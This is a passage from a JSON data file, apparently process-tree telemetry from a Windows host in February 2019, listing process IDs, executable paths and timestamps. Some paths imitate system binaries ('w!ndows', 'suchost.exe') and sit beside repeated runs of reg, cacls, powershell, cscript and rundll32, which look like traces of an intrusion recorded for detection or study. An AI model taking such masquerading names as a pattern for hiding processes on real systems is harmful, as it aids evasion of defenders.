",\"1002/543/587/588/593\",\"1002/543/587/588/596\",\"1002/543/587/588/597\",\"1002/543/587/588/598\",\"1002/543/587/588/599\",\"1002/543/587/588/602\",\"1002/543/587/588/603\",\"1002/543/587/588/604\",\"1002/543/587/588/605\",\"1002/543/587/588/606\",\"1002/543/587/588/607\",\"1002/543/587/588/608\",\"1002/543/587/588/609\",\"1002/543/587/588/610\",\"1002/543/587/588/611\",\"1002/543/587/588/612\",\"1002/543/587/588/613\",\"1002/543/587/588/614\",\"1002/543/587/588/615\",\"1002/543/587/588/616\",\"1002/543/587/588/617\",\"1002/543/587/588/618\",\"1002/543/587/588/619\",\"1002/543/587/588/622\",\"1002/543/587/588/623\",\"1002/543/587/588/624\",\"1002/543/625\",\"1002/543/626\",\"1002/543/627\",\"1002/543/628\",\"1002/543/629\",\"1002/543/630\",\"1002/635\",\"1002/650\",\"1002/661\",\"1002/663\",\"1002/663/664\",\"1002/669\",\"1002/670\",\"1002/670/671\",\"1002/670/672\",\"1002/670/673\",\"1002/670/674\",\"1002/670/675\",\"1002/670/676\",\"1002/670/677\",\"1002/670/678\",\"1002/670/681\",\"1002/670/681/682\",\"1002/670/681/682/683\",\"1002/670/681/682/684\",\"1002/670/681/682/685\",\"1002/670/681/682/686\",\"1002/670/681/682/687\",\"1002/670/681/682/688\",\"1002/670/681/682/689\",\"1002/670/681/682/690\",\"1002/670/681/682/691\",\"1002/670/681/682/692\",\"1002/670/681/682/693\",\"1002/670/681/682/694\",\"1002/670/681/682/695\",\"1002/670/681/682/696\",\"1002/670/681/682/697\",\"1002/670/681/682/698\",\"1002/670/699\",\"1002/670/700\",\"1002/670/701\",\"1002/670/702\",\"1002/670/703\",\"1002/670/704\",\"1002/670/705\",\"1002/670/706\",\"1002/670/707\",\"1002/670/708\",\"1002/670/709\",\"1002/670/710\",\"1002/670/711\",\"1002/670/712\",\"1002/670/713\",\"1002/670/714\",\"1002/670/714/715\",\"1002/670/714/715/716\",\"1002/670/714/715/717\",\"1002/670/714/715/718\",\"1002/670/714/715/719\",\"1002/670/714/715/720\",\"1002/670/714/715/721\",\"1002/670/714/715/722\",\"1002/670/714/715/723\",\"1002/670/714/715/724\",\"1002/670/714/715/727\",\"1002/670/714/715/728\",\"1002/670/714/715/729\",\"1002/670/714/715/730\",\"1002/670/714/715/731\",\"1002/670/714/715/732\",\"1002/670/714/715/733\",\"1002/670/714/715/734\",\"1002/670/714/715/735\",\"1002/670/714/715/736\",\"1002/670/714/715/737\",\"1002/670/714/715/738\",\"1002/670/714/715/739\",\"1002/670/714/715/740\",\"1002/670/714/715/741\",\"1002/670/714/715/742\",\"1002/670/714/715/743\",\"1002/670/714/715/744\",\"1002/670/714/715/745\",\"1002/670/714/715/746\",\"1002/670/714/715/747\",\"1002/670/748\",\"1002/670/749\",\"1002/670/750\",\"1002/670/751\",\"1002/670/752\",\"1002/670/753\",\"1002/764\",\"1002/779\",\"1002/785\",\"1002/790\",\"1002/801\",\"1002/802\",\"1002/802/803\",\"1002/802/804\",\"1002/802/805\",\"1002/802/806\",\"1002/802/807\",\"1002/802/808\",\"1002/802/809\",\"1002/802/810\",\"1002/802/811\",\"1002/802/811/812\",\"1002/802/811/812/813\",\"1002/802/811/812/814\",\"1002/802/811/812/815\",\"1002/802/811/812/816\",\"1002/802/811/812/817\",\"1002/802/811/812/817/818\",\"1002/802/811/812/819\",\"1002/802/811/812/820\",\"1002/802/811/812/821\",\"1002/802/811/812/822\",\"1002/802/811/812/823\",\"1002/802/811/812/824\",\"1002/802/811/812/825\",\"1002/802/811/812/827\",\"1002/802/811/812/827/829\",\"1002/802/811/812/830\",\"1002/802/811/812/831\",\"1002/802/811/812/832\",\"1002/802/833\",\"1002/802/834\",\"1002/802/835\",\"1002/802/836\",\"1002/802/837\",\"1002/802/838\",\"1002/802/839\",\"1002/802/840\",\"1002/802/841\",\"1002/802/842\",\"1002/802/843\",\"1002/802/844\",\"1002/802/845\",\"1002/802/846\",\"1002/802/847\",\"1002/802/848\",\"1002/802/848/849\",\"1002/802/848/849/850\",\"1002/802/848/849/851\",\"1002/802/848/849/852\",\"1002/802/848/849/855\",\"1002/802/848/849/856\",\"1002/802/848/849/857\",\"1002/802/848/849/858\",\"1002/802/848/849/859\",\"1002/802/848/849/860\",\"1002/802/848/849/861\",\"1002/802/848/849/862\",\"1002/802/848/849/863\",\"1002/802/848/849/864\",\"1002/802/848/849/865\",\"1002/802/848/849/866\",\"1002/802/848/849/867\",\"1002/802/848/849/868\",\"1002/802/848/849/869\",\"1002/802/848/849/870\",\"1002/802/848/849/871\",\"1002/802/848/849/872\",\"1002/802/848/849/873\",\"1002/802/848/849/874\",\"1002/802/848/849/875\",\"1002/802/848/849/876\",\"1002/802/848/849/877\",\"1002/802/848/849/878\",\"1002/802/848/849/879\",\"1002/802/848/849/880\",\"1002/802/848/849/881\",\"1002/802/882\",\"1002/802/883\",\"1002/802/884\",\"1002/802/885\",\"1002/802/886\",\"1002/802/887\",\"1002/888\",\"1002/899\",\"1002/904\",\"1002/904/905\",\"1002/916\",\"1002/92\",\"1002/923\",\"1002/932\",\"1002/933\",\"1002/933/934\",\"1002/933/935\",\"1002/933/936\",\"1002/933/937\",\"1002/933/938\",\"1002/933/939\",\"1002/933/940\",\"1002/933/941\",\"1002/933/946\",\"1002/933/947\",\"1002/933/948\",\"1002/933/949\",\"1002/933/950\",\"1002/933/951\",\"1002/933/952\",\"1002/933/953\",\"1002/933/954\",\"1002/933/955\",\"1002/933/956\",\"1002/933/957\",\"1002/933/958\",\"1002/933/959\",\"1002/933/960\",\"1002/933/961\",\"1002/933/962\",\"1002/933/962/963\",\"1002/933/962/963/964\",\"1002/933/962/963/965\",\"1002/933/962/963/966\",\"1002/933/962/963/967\",\"1002/933/962/963/968\",\"1002/933/962/963/969\",\"1002/933/962/963/970\",\"1002/933/962/963/971\",\"1002/933/962/963/972\",\"1002/933/962/963/973\",\"1002/933/962/963/974\",\"1002/933/962/963/975\",\"1002/933/962/963/976\",\"1002/933/962/963/977\",\"1002/933/962/963/978\",\"1002/933/962/963/979\",\"1002/933/962/963/980\",\"1002/933/962/963/981\",\"1002/933/962/963/982\",\"1002/933/962/963/983\",\"1002/933/962/963/984\",\"1002/933/962/963/985\",\"1002/933/962/963/986\",\"1002/933/962/963/987\",\"1002/933/962/963/988\",\"1002/933/962/963/989\",\"1002/933/962/963/990\",\"1002/933/962/963/991\",\"1002/933/962/963/992\",\"1002/933/962/963/993\",\"1002/933/994\",\"1002/933/995\",\"1002/933/996\",\"1002/933/997\",\"1002/933/998\",\"1002/933/999\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4902019-02-09 23:26:47.740000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-09 23:26:47.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe502019-02-09 23:26:47.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17482019-02-09 23:26:47.950000\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe0x15842019-02-09 23:26:48.073000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12bc2019-02-09 23:26:48.093000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe0x12602019-02-09 23:26:48.107000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-09 23:26:48.120000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x14882019-02-09 23:28:02.250000\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe0x1e3c2019-02-10 00:00:00.770000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x19282019-02-10 00:00:00.800000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x9ac2019-02-10 00:28:02.250000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x23782019-02-09 21:28:02.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4b82019-02-10 00:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ca42019-02-10 00:44:47.433000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a442019-02-10 00:44:47.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19842019-02-10 00:44:47.463000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x10042019-02-10 00:44:54.540000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 00:44:54.557000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 00:45:10.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd6c2019-02-10 00:45:10.730000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x12482019-02-10 00:45:11.300000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22282019-02-10 00:45:11.340000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13482019-02-10 00:45:11.390000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 00:45:11.440000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17b02019-02-10 00:45:11.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5182019-02-10 00:45:11.540000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x4942019-02-10 00:45:11.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15842019-02-10 00:45:11.640000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c02019-02-10 00:45:11.690000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xde42019-02-10 00:45:11.763000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21f82019-02-10 00:45:12.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x38c2019-02-10 00:45:12.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc4c2019-02-10 00:45:12.747000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc982019-02-10 00:45:25.893000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8c42019-02-10 00:45:25.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x16e02019-02-10 00:45:40.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:45:40.470000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x13982019-02-10 00:45:53.590000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xeac2019-02-10 00:45:53.627000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x3942019-02-10 00:46:06.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f602019-02-10 00:46:06.810000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x19042019-02-10 00:46:19.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16142019-02-10 00:46:19.950000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8342019-02-10 00:46:33.137000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf3c2019-02-10 00:46:33.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23882019-02-10 00:46:46.277000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe102019-02-10 00:46:46.293000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x16d42019-02-10 00:46:59.423000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 00:46:59.450000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12802019-02-10 00:47:12.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14ec2019-02-10 00:47:12.593000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22c02019-02-10 00:47:25.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b642019-02-10 00:47:25.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:47:38.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23ec2019-02-10 00:47:38.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10a82019-02-10 00:47:52.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4902019-02-10 00:47:52.020000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 00:48:05.117000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 00:48:05.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 00:48:18.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d382019-02-10 00:48:18.353000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xfcc2019-02-10 00:48:18.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 00:48:18.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x94c2019-02-10 00:48:18.443000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:48:37.320000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8f82019-02-10 00:48:37.347000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12502019-02-10 00:48:59.900000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c842019-02-10 00:48:59.923000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1d342019-02-10 00:49:13.023000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17042019-02-10 00:49:13.053000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 00:49:30.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8342019-02-10 00:49:30.227000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1fd02019-02-10 00:49:57.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xcc82019-02-10 00:49:57.533000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb482019-02-10 00:50:10.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 00:50:10.677000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x21642019-02-10 00:50:26.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19c82019-02-10 00:50:26.837000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ed42019-02-10 00:50:52.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20082019-02-10 00:50:52.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10402019-02-10 00:50:52.467000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd802019-02-10 00:51:17.663000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19a82019-02-10 00:51:17.687000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x17d82019-02-10 00:51:42.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21c82019-02-10 00:51:43.013000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-10 00:52:09.227000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a42019-02-10 00:52:09.243000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x19842019-02-10 00:52:09.277000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ca42019-02-10 00:52:09.290000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1a442019-02-10 00:52:09.307000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x7fc2019-02-10 00:52:09.357000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b102019-02-10 00:52:09.383000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xe042019-02-10 00:52:09.403000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12f82019-02-10 00:52:09.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 00:52:09.440000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1bc02019-02-10 00:52:09.460000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xa242019-02-10 00:52:09.487000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x22a82019-02-10 00:52:09.503000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x3942019-02-10 00:52:09.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f82019-02-10 00:52:09.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12502019-02-10 00:52:09.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23642019-02-10 00:52:09.663000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x9ec2019-02-10 00:52:34.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 00:52:34.963000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe082019-02-10 00:53:00.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 00:53:00.220000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb42019-02-10 00:53:25.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12782019-02-10 00:53:25.473000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x53c2019-02-10 00:53:50.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9742019-02-10 00:53:50.740000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17202019-02-10 00:54:15.967000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1fc02019-02-10 00:54:15.990000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1af02019-02-10 00:54:41.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ea02019-02-10 00:54:41.247000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18502019-02-10 00:55:06.503000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11f02019-02-10 00:55:06.520000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c202019-02-10 00:55:32.707000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d082019-02-10 00:55:32.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed42019-02-10 00:55:32.740000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe502019-02-10 00:55:57.930000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6842019-02-10 00:55:57.947000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf582019-02-10 00:56:23.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e02019-02-10 00:56:23.203000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xcc02019-02-10 00:56:48.420000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3c42019-02-10 00:56:48.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 00:57:13.700000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc142019-02-10 00:57:13.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xe602019-02-10 00:57:38.920000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19902019-02-10 00:57:38.940000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14202019-02-10 00:58:04.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d902019-02-10 00:58:04.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15c82019-02-10 00:58:29.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfcc2019-02-10 00:58:29.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17a82019-02-10 00:58:54.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x212c2019-02-10 00:58:54.673000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-10 00:59:19.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c242019-02-10 00:59:19.930000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12502019-02-10 00:59:45.177000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1d9c2019-02-10 00:59:45.200000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xc4c2019-02-10 01:00:10.450000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6482019-02-10 01:00:10.500000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x12e02019-02-10 01:00:35.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbe42019-02-10 01:00:35.747000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc1c2019-02-10 01:01:01.007000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x203c2019-02-10 01:01:01.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1e8c2019-02-10 01:01:26.257000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc802019-02-10 01:01:26.323000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x10802019-02-10 01:01:51.563000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e442019-02-10 01:01:51.587000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18042019-02-10 01:02:16.817000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e302019-02-10 01:02:16.843000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xd742019-02-10 01:02:42.083000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x162c2019-02-10 01:02:42.147000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xcec2019-02-10 01:03:10.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10d02019-02-10 01:03:10.380000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1d542019-02-10 01:03:17.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23d42019-02-10 01:03:17.473000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12c42019-02-10 01:03:35.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18682019-02-09 21:44:46.750000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5942019-02-09 21:44:46.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20802019-02-09 21:44:46.937000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23e82019-02-09 21:44:46.950000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xc682019-02-09 21:44:52.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-09 21:44:52.027000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xf802019-02-09 21:56:28.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xd982019-02-09 21:56:28.403000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6c02019-02-09 21:56:28.413000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d82019-02-09 21:56:28.427000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xdb02019-02-09 21:56:35.493000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7702019-02-09 21:56:35.510000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xfcc2019-02-09 21:56:43.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17142019-02-09 21:56:43.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf082019-02-09 21:56:46.590000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22a82019-02-09 21:56:46.607000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-09 21:56:46.623000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11cc2019-02-09 21:56:46.640000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8502019-02-09 21:56:46.667000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23842019-02-09 21:56:46.677000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xda42019-02-09 21:56:46.690000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1e442019-02-09 21:56:46.700000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-09 21:56:46.713000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x12cc2019-02-09 21:56:46.740000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xbd02019-02-09 21:56:46.753000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x67c2019-02-09 21:56:46.767000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1b502019-02-09 21:56:46.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xfd42019-02-09 21:56:46.793000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16e02019-02-09 21:56:46.840000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8c42019-02-09 21:56:56.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1ac42019-02-09 21:56:56.957000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22782019-02-09 21:57:25.140000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x154c2019-02-09 21:57:25.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12bc2019-02-09 22:02:05.287000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x17342019-02-09 22:02:26.477000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x123c2019-02-09 22:02:26.493000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x5502019-02-09 22:02:27.520000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16802019-02-09 22:02:27.543000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-09 22:02:28.570000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x16fc2019-02-09 20:28:02.213000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x5ac2019-02-10 01:28:02.250000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21f42019-02-10 01:48:41.673000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xfe02019-02-10 02:28:02.243000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x17ac2019-02-10 02:37:21.853000\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe0x1e682019-02-10 03:00:00.720000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x107c2019-02-10 03:06:45.900000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x19342019-02-10 03:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfbc2019-02-10 03:44:47.260000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x2d02019-02-10 03:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x5c2019-02-10 03:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 03:44:47.487000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11f02019-02-10 03:44:57.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 03:44:57.623000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xb482019-02-10 03:45:14.760000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 03:45:14.783000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe602019-02-10 03:45:33.873000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1fe82019-02-10 03:45:33.890000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x107c2019-02-10 03:45:33.920000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9f02019-02-10 03:45:33.937000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x9742019-02-10 